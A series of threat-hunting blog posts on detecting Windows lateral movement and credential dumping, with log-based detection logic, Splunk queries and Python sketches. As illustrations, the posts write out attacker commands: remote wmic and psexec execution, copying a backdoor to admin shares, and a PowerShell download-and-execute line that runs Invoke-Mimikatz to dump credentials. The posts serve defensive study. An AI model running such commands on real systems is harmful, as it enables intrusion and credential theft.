Friday, December 8, 2017

A Few of My Favorite Things - Continued

In my last post I talked a lot about how I think about finding bad guys: from creating mind maps of the things I should be looking for, to the need to move beyond simple IOC-based detection and into a more dynamic approach where alerts are clusters of events linked by time and by source, destination, and user.  I also described a simple scenario of the actions an attacker could take to dump credentials on a host and how those actions map to the needs of an adversary.  In this post I want to focus less on the thinking aspect and more on the doing.  
To recap the scenario from my last post:

  1. Attacker mounts C$ share on a remote machine
  2. Attacker copies malicious batch script to the mapped share
  3. Attacker issues wmic command to execute batch script on remote machine
  4. Batch script executes powershell that will download and execute invoke-mimikatz
  5. File that is created with the output of invoke-mimikatz is copied from mounted share to local filesystem. 

The above actions taken by the attacker would fall into the maps under the following:

Network Logon: Mounting Share
Data Movement 
Admin Shares: Copy .bat script
WMIC: Execute against remote machines
Rare Explicit logon
Data Movement
HTTP: Download of tool
DLL Loading
Powershell: Command Arguments
Data Movement
Copy: Dump File

The following are the commands that were executed:

  1. net use z: \\\c$ /user:admin1
  2. copy bad.bat z:\temp\bad.bat
  3. wmic /node:"" /user:"\admin1" /password:"Th1sisa-Test" process call create "cmd.exe /c c:\temp\bad.bat"
  4. copy z:\bad.temp .\bad.temp

Based on the above command sequence, what are some questions that you would ask as a result?   

  1. When admins administer remote servers, do they typically use cmd.exe/wmic.exe/powershell.exe to issue commands or do they use some type of remote desktop solution the majority of the time?
  2. When admins administer remote servers do they typically use ip addresses in their commands instead of hostnames?
  3. What is the volume of remote logins from this source machine?
  4. What is the volume of remote logins from this user?
  5. How often has this source machine mounted the C$ share on a remote machine?
  6. How often has this user mounted the C$ share on a remote machine?
  7. How often has the destination machine had the C$ share mounted?
  8. How often is the copy command used to copy batch scripts to the C$ share of a remote machine?
  9. Is it common for an admin to use WMIC to connect to and issue commands on a remote machine?
  10. If the majority of these are common practice in your environment, is this cluster of events common?

Below are the contents of bad.bat and the same question applies.  What are some of the things you could key off of in order to possibly build some detection?

@echo off
powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds" >> c:\bad.temp

  1. How often does powershell initiate a web request?
  2. Have we seen a command like this in the past?
  3. Have we seen the destination web server previously in a powershell command?
  4. How can we tell if Invoke-Mimikatz was executed?

This is good.  We have several things that we can go after to begin building out some behavior-based detection.  As we start creating queries for the above, keep in mind that you may need to use multiple log sources.  If this is the case, do yourself a favor and try to normalize the fields.  It's much easier to pivot and correlate across log sources when the fields are the same.
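To make the normalization idea concrete outside of any particular SIEM, here is a minimal Python sketch.  The sourcetype names and field mappings are made up for illustration; substitute whatever your own log sources actually emit.

```python
# Map each log source's native field names onto one common schema so
# pivots and correlations line up across sources.  The sourcetypes and
# field names below are illustrative, not from any particular product.
FIELD_MAP = {
    "wineventlog:security": {
        "Source_Address": "src_ip",
        "Account_Name": "user",
        "ComputerName": "dest_host",
    },
    "sysmon": {
        "SourceIp": "src_ip",
        "User": "user",
        "Computer": "dest_host",
    },
}

def normalize(event, sourcetype):
    """Return a copy of the event with common field names applied."""
    mapping = FIELD_MAP.get(sourcetype, {})
    return {mapping.get(key, key): value for key, value in event.items()}
```

Once every source speaks the same schema, a pivot on `src_ip` or `user` works the same no matter which log the event came from.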

The obvious next step in our process would be to start building out the queries, but before we begin we need to understand our infrastructure, how these queries may perform, and whether there will be any impact from scheduling them to run regularly.  I have had the displeasure of working on systems where a query would have taken longer to run than the interval at which it was scheduled.  If this is the case, is there anything you can do to streamline your searches?  Speaking strictly about Splunk, there is a method to create data models from log sourcetypes.  The result is a dramatic increase in speed when building complex queries that look across large amounts of data.  It may be worth investigating whether the tool you are working with has a similar option.

Also keep in mind that the above is just one single action that could be taken by an attacker during an intrusion.  If these actions were part of an active intrusion there would likely be many more opportunities for detection.  The queries that we will be creating are building blocks that can be used to start surfacing behaviors.  These building blocks are likely valid for many other behaviors that may be taken during the course of an intrusion.  The more building blocks you have the better your visibility into behaviors becomes.  The more log sources that are queried and used for building blocks the more context your alerts will have.   By clustering these building blocks and identifying the anomalous (actions, src, dest, user) you have a very good chance of spotting what otherwise may have been missed.

For these examples I'm using Windows event logs and Sysmon logs because that is what I have logging in my lab.  I know that company logging policies and standards are all over the place, or even non-existent, and that detection and logging tools differ.  These examples won't match exactly what your environment looks like.  The trick is to determine what you can detect with the log sources and the tools you have available.  Detection and hunting is not easy.  Know your tools as well as your data and be creative in how you go about hunting for bad guys.  It's an art! 

I know that not everyone reading this is a Splunk user, so I'm including key items that you can look for in your logs, but not the specific queries.  If enough people ask, I may include them in a separate blog post.

4624 Type 3 Logon

As adversaries move around your network they will often use built-in Windows tools, such as the "net" commands.  These commands will generate a 4624 Type 3 network logon.  Attackers will also likely stray from the normal logon patterns within your environment: logon times, users, and src/dest combinations may look different.  By looking for rare combinations where there is a remote IP address, you may be able to reduce some of the noise while still identifying the events that should be investigated.
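As a sketch of the rarity idea, and assuming the events have already been normalized into dicts with `src_ip`, `dest_host`, and `user` fields (an assumption, not a given log format), the logic is just counting combinations:

```python
from collections import Counter

def rare_logon_combos(events, threshold=2):
    """Given 4624 Type 3 events as dicts, count each
    (src_ip, dest_host, user) combination and return the ones seen
    fewer than `threshold` times -- the rare combinations worth a look."""
    counts = Counter((e["src_ip"], e["dest_host"], e["user"]) for e in events)
    return sorted(combo for combo, n in counts.items() if n < threshold)
```

The threshold and the lookback window are knobs you would tune against your own baseline, not fixed values.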

Log Source: Windows Security Events

Command line with ip

If you have command line process audit logging within your environment, it may be useful to determine how your admins administer remote machines.  Do they typically connect to them by IP address or by hostname?  By knowing what is normal within your network, it is much easier to develop queries that will surface the abnormal.

Log Source: Sysmon
Regex CommandLine="[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"
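As a toy illustration outside of Splunk, the same dotted-quad pattern can be applied to command lines in a few lines of Python:

```python
import re

# The same dotted-quad pattern as above, applied to a command line.
IP_RE = re.compile(r"[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")

def commandline_has_ip(cmdline):
    """True if a command line contains something that looks like an IPv4
    address -- a possible sign of a machine being targeted by address
    rather than hostname."""
    return bool(IP_RE.search(cmdline))
```

Note the pattern is loose (it would match 999.999.999.999 too); for hunting purposes that looseness is usually acceptable.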

C$ share identified in command line

Using Windows shares is an easy way for an attacker to move data around, whether it's tools that have been brought in or data intended for exfiltration.  Pay attention to machines and users accessing hidden shares.  Is this a rare occurrence for this machine, this user, or the combination of both?  Also pay attention to the process responsible for accessing the share and what the action is.

Log Source: Sysmon

HTTP request via powershell

This goes along with knowing your environment.  Is it normal for powershell to invoke a web request?  If the answer is yes, are the destinations unique?  By looking for unique destinations that were the result of powershell invoking a web request, you have a high likelihood of spotting a malicious command.

Log Source: Sysmon
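A minimal sketch of that logic, assuming process-creation events with `Image` and `CommandLine` fields and a set of previously seen destinations (all illustrative names), might look like:

```python
import re

# Rough URL matcher; stops at whitespace, quotes, and parentheses so it
# copes with strings like DownloadString('http://host/a.ps1').
URL_RE = re.compile(r"""https?://[^\s'")(]+""", re.IGNORECASE)

def new_powershell_destinations(events, known_hosts):
    """From process-creation events, pull URLs out of powershell command
    lines and return any destination host not already in known_hosts."""
    hits = []
    for event in events:
        if "powershell" not in event.get("Image", "").lower():
            continue
        for url in URL_RE.findall(event.get("CommandLine", "")):
            host = url.split("/")[2]
            if host not in known_hosts:
                hits.append(host)
    return hits
```

Anything this surfaces is not automatically bad, but a powershell web request to a never-before-seen destination is well worth a look.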

Data movement dest to source

Similar to the C$ share behavior: whether it's tools that have been brought in or data intended for exfiltration, pay attention to machines and users accessing hidden shares and the data that is passed between them.  Is this a rare occurrence for this machine, this user, or the combination of both?  

Log Source: Windows Security Events
Access_Mask=0x120089) within 1 second
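The "within 1 second" part of these correlations is easy to express in any language.  A minimal sketch, assuming normalized events with `dest_host`, `epoch`, and `access_mask` fields (illustrative names), buckets events into 1-second spans per host:

```python
from collections import defaultdict

def share_access_clusters(events):
    """Bucket 5145 share-access events into 1-second spans per host and
    return the buckets containing more than one distinct Access Mask --
    a rough stand-in for a `bucket span=1s` style correlation."""
    buckets = defaultdict(set)
    for event in events:
        buckets[(event["dest_host"], int(event["epoch"]))].add(event["access_mask"])
    return {key: masks for key, masks in buckets.items() if len(masks) > 1}
```

The specific masks you require inside a bucket would come from your own testing of the copy behavior you care about.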

Data movement source to dest

Similar to the C$ share behavior: whether it's tools that have been brought in or data intended for exfiltration, pay attention to machines and users accessing hidden shares and the data that is passed between them.  Is this a rare occurrence for this machine, this user, or the combination of both?

Log Source: Windows Security Events
Access_Mask=0x130197) within 1 second

Remote WMIC

Execution is an attacker need.  We've already said that attackers will often use Windows tools when moving laterally within your network, and wmic can be a method an attacker uses to execute commands on a remote machine.  Pay attention to source/dest/user combinations and the processes that are spawned on the remote machine.  This query is intended to identify the processes that are spawned within 1 second of wmiprvse executing on the destination side of the wmic command.  It will also attempt to identify the source of the wmic connection.

Log Source: Windows Security Events

Sub Search

Display source address and all processes spawned in that 1 second span.
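The destination-side half of that correlation can be sketched in Python.  This assumes process-creation events as dicts with `host`, `image`, and `epoch` fields (illustrative names) and simply looks for processes created shortly after WmiPrvSE.exe started on the same host:

```python
def wmi_spawned_processes(events, window=1.0):
    """Return images of processes created within `window` seconds after
    WmiPrvSE.exe started on the same host -- candidate children of a
    remote wmic 'process call create'."""
    wmi_starts = [(e["host"], e["epoch"]) for e in events
                  if e["image"].lower().endswith("wmiprvse.exe")]
    hits = []
    for e in events:
        if e["image"].lower().endswith("wmiprvse.exe"):
            continue
        if any(e["host"] == host and 0 <= e["epoch"] - start <= window
               for host, start in wmi_starts):
            hits.append(e["image"])
    return hits
```

On a busy server WmiPrvSE will have plenty of legitimate children, so in practice you would layer the rarity questions from earlier on top of this raw output.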

WMIC 4648 login

Execution is an attacker need.  We've already said that attackers will often use Windows tools when moving laterally within your network, and wmic can be a method an attacker uses to execute commands on a remote machine.  By monitoring explicit logons you can identify the users, machines, and processes that were used and that resulted in an authentication to a remote machine.  This query watches for processes that are often used during lateral movement.

Log Source: Windows Security Events

Process spawned from cmd.exe

Cmd.exe is probably the most executed process by an attacker during KC7.  Monitor child processes and identify those clusters that may be related to malicious execution.

Log Source: Sysmon

Mounting remote $ share

Using Windows shares is an easy way for an attacker to move data around, whether it's tools that have been brought in or data intended for exfiltration.  Pay attention to machines and users accessing hidden shares.  Is this a rare occurrence for this machine, this user, or the combination of both?  

Log Source: Windows Security Events
Event Code=5140

Possible credential dumper execution

Attackers need credentials if they are going to move laterally.  Identifying the potential execution of a credential dumper is important, as these tools can often be missed by AV.  This query looks at the DLLs loaded by each process and identifies the clusters of DLLs often used together by various credential dumping tools.

Log Source: Sysmon
ImageLoaded=msv1_0.dll) > 2 by process
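The counting logic behind a "distinct suspect DLLs per process" query is straightforward.  A sketch, where the DLL list is illustrative (tune it against your own testing of the dumpers you care about) and the input is (process, dll) pairs from image-load events:

```python
from collections import defaultdict

# DLLs that credential-dumping tools tend to load together.  This list
# is illustrative, not authoritative -- build yours from testing.
SUSPECT_DLLS = {"samlib.dll", "vaultcli.dll", "cryptdll.dll", "msv1_0.dll"}

def possible_credential_dumpers(dll_loads, min_distinct=3):
    """Given (process, dll) pairs from DLL-load events, return processes
    that loaded `min_distinct` or more distinct suspect DLLs, mirroring
    the `> 2 by process` threshold above."""
    seen = defaultdict(set)
    for process, dll in dll_loads:
        if dll.lower() in SUSPECT_DLLS:
            seen[process].add(dll.lower())
    return sorted(p for p, dlls in seen.items() if len(dlls) >= min_distinct)
```

Counting distinct DLLs rather than raw load events is what keeps a process that loads msv1_0.dll once for a legitimate reason from tripping the threshold.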

Our next step would be to begin correlating the results of these queries, but unfortunately, with a Splunk free license, the ability to generate alerts expires after 30 days.  The alerts are needed in order to log the output of your queries to a separate index from which we would do our correlation.  I have previously blogged about using queries such as the above and building correlation around them.  This post can be found here:

The above queries are the building blocks that will be used as part of a more dynamic, behavior-based detection methodology.  The more you build out and correlate queries based on the actions adversaries take, the more your capability to find previously undetected TTPs increases.

I wasn't able to include screenshots of each query as the post, I believe, exceeded the maximum size.  I am, however, including a couple of screenshots of the results of the queries.  If these queries were correlated into a single alert, it should paint a pretty good picture that this is very bad.

Sunday, November 26, 2017

A Few Of My Favorite Things

Today I want to talk about a couple of my favorite things: finding bad guys and thinking about finding bad guys.  When I talk about "thinking" I don't mean fantasizing about the act of finding a successful intrusion, but rather asking what steps I need to incorporate or modify to increase my chances of locating evil on my network.  I've actually been wanting to write this post for a while and I finally got a bit of motivation after a few tweets this past week.

I believe attackers will always leave traces of their activity.  No matter how subtle the indicators may be, it is our job to find and interpret them so that we can respond accordingly.  So the question is, how do we go about finding these indications that attackers are in our network?  To answer this question, I think it helps to focus our thoughts in a way that will help us understand the relationships between the things we are trying to identify.  By focusing on these relationships we can then begin to surface patterns in our data.  Sitting down and mapping out the things you know about adversary activity is a great place to start.  It should be said that I don't care about mapping the TTPs of a specific actor at this point.  I simply want to lump everything together so that I can get an idea of the things I should be looking for and the state of my detection at this point in time.  To aid us in this quest we can pull data from internal response actions that we've performed, public reporting, private sharing, or even hunches that we have (don't ever discount these).  Aside from internal response actions, one of the best sources for this type of data gathering is definitely MITRE's ATT&CK Framework.  There is a wealth of information in the framework as well as in their Cyber Analytic Repository.  

Earlier this year, as I was recovering from open heart surgery, I felt like I needed a project to keep my mind busy, so I sat down and did just what I described above.  I took a look at what I knew, as well as what I could find, regarding KC7 activity and mapped those actions to what I see as adversary needs.  It was a really good exercise in my opinion.  It not only helped me focus on the things I should be looking for, but also let me visually see my ability to map behaviors through multiple stages of an intrusion.  I tweeted these maps earlier this year, which can be found here:

Next we need to understand what logs we have available as well as how to interpret them.  Do you know the above actions well enough to know what a positive example would look like in the logs that you have?  If the answer is no, prepare to spend some time testing.  Do you know these log sources well enough to know what you can and can't detect in them (note that surfacing a single action may very well be a correlated event that spans multiple log sources)?  If the answer is no, prepare to spend some time in them.  Keep in mind that we can often surface needed data by writing rules in our existing tools to log whenever a certain event has been identified.  I believe this is a great way to maximize the use of our current logs.  Don't forget to consider both the source and the destination when trying to determine what can and can't be found.  For actions that can't be detected due to gaps in coverage, make sure to document them as well as a log source or sources that would provide the needed visibility (be ready to provide management with a solution to a problem).

So if you set out to create detection for credential theft and only wanted to look for static indicators, you could do that.  You could write detection for, and alert on, AV threat names, service names, or specific filenames, but ask yourself: why do adversaries keep going back to these tools?  Because, for various reasons, they work and go undetected a large percentage of the time.  I am in no way saying that it's a waste of time to try to detect those static IOCs.  We should, hands down, have detection and alerting for those.  But when we have completed that task we shouldn't assume that we are finished.  There is much more that can be done.  Let's take a look at a sample scenario involving invoke-mimikatz.

  1. Attacker mounts C$ share on a remote machine
  2. Attacker copies malicious batch script to the mapped share
  3. Attacker issues wmic command to execute batch script on remote machine
  4. Batch script executes powershell that will download and execute invoke-mimikatz
  5. File that is created with the output of invoke-mimikatz is copied from mounted share to local filesystem. 

The above actions taken by the attacker would fall into the maps under the following:
Network Logon: Mounting Share
Data Movement 
Admin Shares: Copy .bat script
WMIC: Execute against remote machines
Rare Explicit logon
Data Movement
HTTP: Download of tool
DLL Loading
Powershell: Command Arguments
Data Movement
Copy: Dump File

As you can see, the act of dumping credentials involved 4 out of 5 needs.  It should also be noted that not one of the above detections is specifically related to finding Invoke-Mimikatz; instead, each is related to surfacing an action (or building block) with the intent of bubbling up a malicious chain of events.  The more effort that is put into defining, gaining visibility into, and alerting on these building blocks, the more dynamic your detection may become.  By looking for clusters of events across multiple needs you should be able to quickly spot anomalous activity.  

Saturday, April 29, 2017

Billions and Billions of Logs; Oh My

As I'm sure many of you know, I was scheduled to talk at a couple of different conferences (SANS Threat Hunting Summit and x33fcon), but was unable to due to needing open heart surgery.  Not wanting all of the preparation work for these conferences to go to waste, I posted the slides here: (If you have not looked at these slides I would suggest that you do before continuing).  After posting, I received some great responses to the slides and wanted to do a blog post discussing a few of my thoughts, since I doubt I will ever give the presentation.  I also wanted to exercise my mind a bit by focusing on one of the things that I love to do (hunting).  I've been exercising my body every day and it has responded well, so the same should be true for my mind, right?

We know that companies are consuming huge amounts of data and that the people tasked with hunting through these logs often struggle with the volume.  The question is: How do we, as hunters and defenders, navigate this sea of data and still be able to find what our current detection technologies aren’t finding? This is not an easy task, but I think a lot of it comes down to the questions that we ask.

What am I looking for?
I think often we may try to generalize the things we are hunting for.  This generalization can lead to broader queries and introduce vast amounts of unneeded logs into your results.  Know exactly what it is that you are looking for and, to the best of your knowledge, what it would look like in the logs that you have.  Keep in mind that the smaller the "thing" is that you are trying to find, the more focused your query can become.

Why am I looking for it?
Define what is important to your org and scope your hunts accordingly.  Once you define what you will be hunting, break that down into smaller pieces and tackle those one at a time.  Prioritize and continue to iterate through your defined process.

How do I find it?
Don't get tunnel vision.  If your queries are producing far too many results, know that they will be very difficult to transition to automated alerting.  Can you look at the problem you are trying to solve differently and therefore produce different results?  This is, by the way, the topic for the rest of this post.

Take KC7, for example.  Often the actions that attackers take are the same actions taken legitimately by users millions upon millions of times a day.  From authenticating to a domain controller to mounting a network share, these are legitimate actions that can be seen every minute of every day on a normal network.  They can also be signs of malicious activity.  So how can we tell the difference?  This is where looking at the problem differently comes into play.  Before we delve into that, though, we need to look at attackers and how they may operate.  We can then use what we think we know about them to our advantage.

I used the following hypotheses in my slides, and I think you would often see some or all of them in the majority of intrusions.

  1. Comprised of multiple actions.
  2. Actions typically happen over short time spans.
  3. Will often use legitimate Windows utilities.
  4. Will often use tools brought in with them.
  5. Will often need to elevate permissions.
  6. Will need to access multiple machines.
  7. Will need to access files on a filesystem. 

Based on the above hypotheses we are able to derive attacker needs.

  1. Execution
  2. Credentials
  3. Enumeration
  4. Authentication
  5. Data Movement

I also know that during an active intrusion, attackers are very goal focused.  Their actions can typically be associated with one of the above needs, and you may see multiple needs from a single entity in very short time spans.  If you contrast that with how a normal user looks on a network, the behavior is typically very different.  We can use these differences to our advantage: instead of looking for actions that would likely produce millions of results, we can look for patterns of behaviors that fall into multiple needs.  By looking for indications of needs and chaining them together by time and an additional common entity, such as source host, destination host, or user, we can greatly reduce the amount of data we need to hunt through.  
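The chaining idea can be sketched in a few lines.  This assumes each building-block query emits hits as dicts with `src_host`, `need`, and `epoch` fields, and uses an arbitrary 3-need / 5-minute threshold; all of those are illustrative choices, not rules:

```python
from collections import defaultdict

def chains_by_entity(hits, window=300):
    """Group building-block hits by a shared entity (here, source host)
    and return entities showing 3 or more distinct attacker needs
    inside a `window`-second span."""
    by_entity = defaultdict(list)
    for hit in hits:
        by_entity[hit["src_host"]].append(hit)
    chains = {}
    for entity, entity_hits in by_entity.items():
        entity_hits.sort(key=lambda h: h["epoch"])
        for i, first in enumerate(entity_hits):
            needs = {h["need"] for h in entity_hits[i:]
                     if h["epoch"] - first["epoch"] <= window}
            if len(needs) >= 3:
                chains[entity] = needs
                break
    return chains
```

The same grouping could just as easily be keyed on destination host or user; in practice you would run it against each pivot and compare.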

So how do we get there?
  1. Develop queries for specific actions based on attacker needs
            a. Accuracy of query is key
            b. Volume of output is not
  2. Enhance data with queries from detection technologies
  3. Store output of queries in central location
  4. Each query makes a link
  5. The sum of links make up a chain

Attackers will continue to operate in our environments and the amount of data that we collect will continue to grow.  Being able to come up with creative ways to utilize this data and still find evil is essential.  I would love to know your thoughts on this or whether you have other ways of dealing with billions and billions of logs.  Feel free to reach out in the comment section or on twitter @jackcr.

I would also like to thank everyone who has reached out to me over the past weeks.  You are all awesome and have helped and inspired me more than you will ever know.  I can’t thank you all enough.  I would also like to thank SANS and x33fcon for giving me the opportunity to speak and for being amazing when I had to cancel! 

Thursday, February 23, 2017

Hunting for Chains

In my last blog post I touched on something that I want to talk more about.  I think far too often, when hunting, we can focus on single indications for signs of something being bad.  Intrusions are far more than a single event though, so why spend all of your time hunting that way?  Often the actions that an attacker will take will be in short time bursts.  These bursts may only last for a few seconds to a few minutes.  Looking for multiple events within these windows of time, I feel, can be a very effective way to spend your time.

One of the things I try to do with my blog is to share how I think about the work that I do.  I have gained so much knowledge from others over the years and feel strongly about giving back.  Lately I have been thinking a lot about what I like to call behavior chains.  Basically, these are the actions that an attacker would likely take to accomplish their goal.  Each action is a link and the sum of the actions makes up the chain.  A link can be something as simple as a process name like net.exe or cmd.exe (these are probably 2 of the most commonly spawned processes and attackers definitely take advantage of them).  A link can also be something as complex as a correlation search that surfaces a specific behavior (see my last blog post for some of these correlations).  So why do I care about looking at hunting this way?  There are multiple reasons, but a few of them are modeling how attackers may operate, data reduction, and higher fidelity output.

Let's say that we want to look for odd network logon behavior because we know that when an attacker is active in our environment they will generate anomalous 4624 type 3 events.  The problem with this is that there are likely thousands upon thousands, if not millions, of these events per day.  We could try to reduce this data by looking for rare occurrences of source machine, dest machine, user, or a combination of the three.  This will likely produce anomalies, but it will also take time to investigate each one.  Now take that time and multiply it by the number of days in a week.  How much time are you spending looking at these events and are the results beneficial?

I think the question to ask is what are the things an attacker would do that would generate these logon events.  We know, just from the meaning of the event, that it was the result of an action taken by a remote machine, and we probably care more about the action than the logon itself.  We can also assume that we are trying to identify KC7 type activity, so let's break that down into different categories that may likely generate these types of events.  I'll also include a couple of sample commands for each one.
  1. Recon / Enumeration
    1. net group "domain admins" /domain
    2. net view /domain
  2. Command Execution
    1. psexec -accepteula \\ ipconfig
    2. wmic /node: /user:administrator /password:supersecret process call create "cmd.exe /c ipconfig" 
  3. Data Movement
    1. copy backdoor.exe \\\c$\windows\temp\backdoor.exe
    2. net use x: \\\c$ /user:administrator "supersecret"

Seeing the above commands should obviously raise some alarms, but often it can be difficult to distinguish bad from legitimate activity.  I've personally chased many admins over the years.  The difficulty is shaped by how you craft your queries, the amount of data that's returned, and your ability to identify anomalies.  I think we can also limit ourselves through our understanding of what we are looking for, the log sources we have available, and what we perceive as our limitations in melding the two together.  I should say that I don't have command line process audit logging enabled, but I am still able to accurately identify the actions of the above commands based on the logs generated on the destination machine or the domain controller.

When I began looking into the best way to identify these chains, I knew that there would be numerous actions that I would want to be able to identify and that I would want some freedom in how I searched the data.  Being able to correlate based on source user, dest user, source machine, dest machine, process, or any other pivot point that the data provided was very important.  I also wanted to be able to look across different windows of time and to easily incorporate multiple data sources.

I’ll explain what was accomplished using Splunk.  If you want to explore this and you are not a Splunk user, my hope is that you will be able to use the thought behind the technology and incorporate it into a solution that you have available.  

  1. Scheduled queries for specific behaviors are sent to a summary index to house only interesting data.
  2. Custom event types are created for broader queries (logon types, process names…).
  3. Normalized field names for pivoting through data.  This can be important when searching or displaying fields from multiple log sources.

The screenshots below show 2 different dates.  The first clusters of events, on 2/21, are the results of running the following commands on my domain controller (95N).
    net view \\
    net group "domain admins" /domain
    net use x: \\\c$ /user:administrator "password"

The second cluster of events, on 2/23, is the result of copying a batch script to a member server and executing it.  The contents of the batch script were:
    net group "domain admins" /domain >> data.txt
    netstat -an >> data.out
    ipconfig >> data.out

By ComputerName

By Source IP

I know that this may be an overly simplistic view, but I believe it shows the value of trying to create chains of events.  If someone were looking at each action individually, they could easily be glossed over, but when you combine them you may begin to see clusters of anomalous behavior.  The more of these individual actions you can include in your data collection, the greater the chance you have of surfacing these anomalies.

The power of this is not the technology, but the effort you put into your methods and analysis.  Also, I’m not at all saying that you should stop looking for single events that point to malicious activity, but think of this as simply another arrow you can put in your quiver.

As always, I would love to hear your thoughts.  Feel free to use the comment section below or reach out to me on twitter @jackcr. 

Saturday, February 11, 2017

Patterns of Behavior

If you have been in security for any length of time then you have probably seen David Bianco's Pyramid of Pain.  One of the thoughts behind the pyramid is that the higher up you go, the more cost you impose on the adversary.  The top of the pyramid is where we really want to be, as it's much harder for an adversary to change how they operate, and we, as defenders, can make it very difficult for them to carry out their operations if we can begin to find them at these upper levels. 

I said yesterday in a tweet that a goal of mine is to be able to track an entire intrusion simply by the alerts that I generate.  While that tweet may be a little far-fetched, the sentiment behind it is not.  I want to know as much as I can about attacker activity so that I can effectively build a web of detection.  The bigger and tighter the web, the more chances I will have to identify patterns that would be indicative of attacker activity.  By studying past attacks, public reporting, and any peer sharing, I can shape the things that I should be going after.

Let's say that we have a fictitious actor that we are tracking that we're calling FridayFun.  Let's also say that we have been tracking FridayFun since 2012, when we initially responded to them HERE (Note: this is a link to the download of a memory forensics challenge I created in 2012).  Over the course of time we have identified some of the following techniques used for Kill Chain 7 activity.
  1. The use of net commands for enumeration and lateral movement.
  2. The scheduling of remote tasks.
  3. The use of psexec for tool execution.
  4. Copying of files via command line.

Let's take a look at each of the above and how we may be able to find it in the Windows security events.  Note that these methods require additional Windows logging.  I'm also including Splunk searches that can be used to find this behavior.  If you aren't a Splunk user, my hope is that you can take these queries and incorporate them into a solution or method you have available.

We have identified FridayFun often copying files to $ shares via the command line as in the example below.
copy thisisbad.bat \\\c$\windows\thisisbad.bat

When a file is copied via the command line, the logs produced are different than if you were to copy it via Windows Explorer.  Both methods produce multiple file share access events, but the Access Masks differ depending on the method.  From the command line, these are the unique values:

The following query will identify the 3 unique access masks being created within the same second on a single machine.  

sourcetype=wineventlog:security EventCode=5145 Object_Type=File Share_Name=*$ (Access_Mask=0x100180 OR Access_Mask=0x80 OR Access_Mask=0x130197) |bucket span=1s _time |rex "(?<thingtype>(0x100180|0x80|0x130197))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Source_Address) AS Source_Address, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=3

For the scheduling of remote tasks, let's say that we have identified a pattern of behavior each time FridayFun has utilized this tactic.
  1. Query the remote machine for the local time (think about machines in different time zones).
  2. The remote task is created.
  3. The source machine queries the scheduled task on the remote machine.
This command sequence may look like:
  1. net time \\
  2. at \\ 03:25 c:\windows\thisisbad.bat
  3. at \\

The net time command and remote At query will both produce a 5145 file share event where IPC$ is the share being accessed.  The Access Mask for these 2 events will be 0x12019f.  The Relative Target Name will be different: a srvsvc named pipe will be created for the net time command, while an atsvc named pipe will be created for the At query.  For the creation of the scheduled task we are looking for 4698 events, specifically for At jobs in the Task Name.

The following query will identify the above 3 events occurring within an hour time frame on a single machine.

sourcetype=wineventlog:security (EventCode=4698 Task_Name=\\At*) OR (EventCode=5145 Object_Type=File Share_Name=*IPC$ Access_Mask=0x12019f (Relative_Target_Name=srvsvc OR Relative_Target_Name=atsvc)) |bucket span=1h _time |rex "(?<thingtype>(\\\\At.|srvsvc|atsvc))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Task_Name) AS Task_Name, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=3
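The same hour-bucket correlation can be sketched the same way (again with assumed field names on parsed events; the 3600-second span mirrors |bucket span=1h):

```python
from collections import defaultdict

def find_at_sequence(events, span=3600):
    """Flag (computer, hour) buckets containing an At job creation (4698)
    plus srvsvc and atsvc pipe access (5145), mirroring distinct_things=3."""
    buckets = defaultdict(set)
    for e in events:
        thing = None
        if e.get("EventCode") == 4698 and e.get("Task_Name", "").startswith("\\At"):
            thing = "at_job"
        elif (e.get("EventCode") == 5145
              and e.get("Share_Name", "").endswith("IPC$")
              and e.get("Access_Mask") == "0x12019f"
              and e.get("Relative_Target_Name") in ("srvsvc", "atsvc")):
            thing = e["Relative_Target_Name"]
        if thing:
            buckets[(e["ComputerName"], int(e["_time"]) // span)].add(thing)
    return [k for k, things in buckets.items() if len(things) == 3]

# Hypothetical sample: net time, At query, and job creation within one hour.
events = [
    {"EventCode": 5145, "Share_Name": "\\\\HOST1\\IPC$", "Access_Mask": "0x12019f",
     "Relative_Target_Name": p, "ComputerName": "HOST1", "_time": t}
    for p, t in [("srvsvc", 100), ("atsvc", 200)]
] + [{"EventCode": 4698, "Task_Name": "\\At1", "ComputerName": "HOST1", "_time": 300}]
print(find_at_sequence(events))  # [('HOST1', 0)]
```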

FridayFun often utilizes psexec to aid in execution on remote machines.  We have identified them using commands such as the following:

psexec -accepteula \\ -c gsecdump.exe

When looking for psexec being executed I have found that it may be more beneficial to look for indications on the destination side.  Psexec can often be renamed and may be harder to identify on the source if you aren’t able to log the FileDescription metadata field of the binary when it executes.  On the destination side a 5145 event will be created where the share name is ADMIN$ and the Relative Target Name is PSEXESVC.EXE.  We are also looking for any new process creation within that same second to identify what psexec executed on the destination machine (Note: when psexec copies a file and executes it, it will be spawned from the IPC$ share).

This behavior can be identified by the following query.

sourcetype=wineventlog:security ((EventCode=4688 New_Process_Name!=*\\PSEXESVC.EXE New_Process_Name!=*\\conhost.exe New_Process_Name!=*\\dllhost.exe) OR (EventCode=5145 Share_Name=*ADMIN$ Relative_Target_Name=PSEXESVC.EXE)) |bucket span=1s _time |rex "(?<thingtype>(4688|PSEXESVC))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Source_Address) AS Source_Address, values(New_Process_Name) AS New_Process_Name, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=2
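Sketched outside Splunk, the correlation pairs the service-binary write with process creations in the same second (field names are assumptions mirroring the query; the sample events are hypothetical):

```python
from collections import defaultdict

# Process names excluded in the query above.
EXCLUDED = ("\\psexesvc.exe", "\\conhost.exe", "\\dllhost.exe")

def find_psexec(events):
    """Pair PSEXESVC writes to ADMIN$ (5145) with any other new process
    (4688) in the same second on the same host."""
    buckets = defaultdict(lambda: {"svc": False, "procs": []})
    for e in events:
        key = (e["ComputerName"], int(e["_time"]))
        if (e.get("EventCode") == 5145
                and e.get("Share_Name", "").endswith("ADMIN$")
                and e.get("Relative_Target_Name", "").upper() == "PSEXESVC.EXE"):
            buckets[key]["svc"] = True
        elif e.get("EventCode") == 4688:
            name = e.get("New_Process_Name", "")
            if not name.lower().endswith(EXCLUDED):
                buckets[key]["procs"].append(name)
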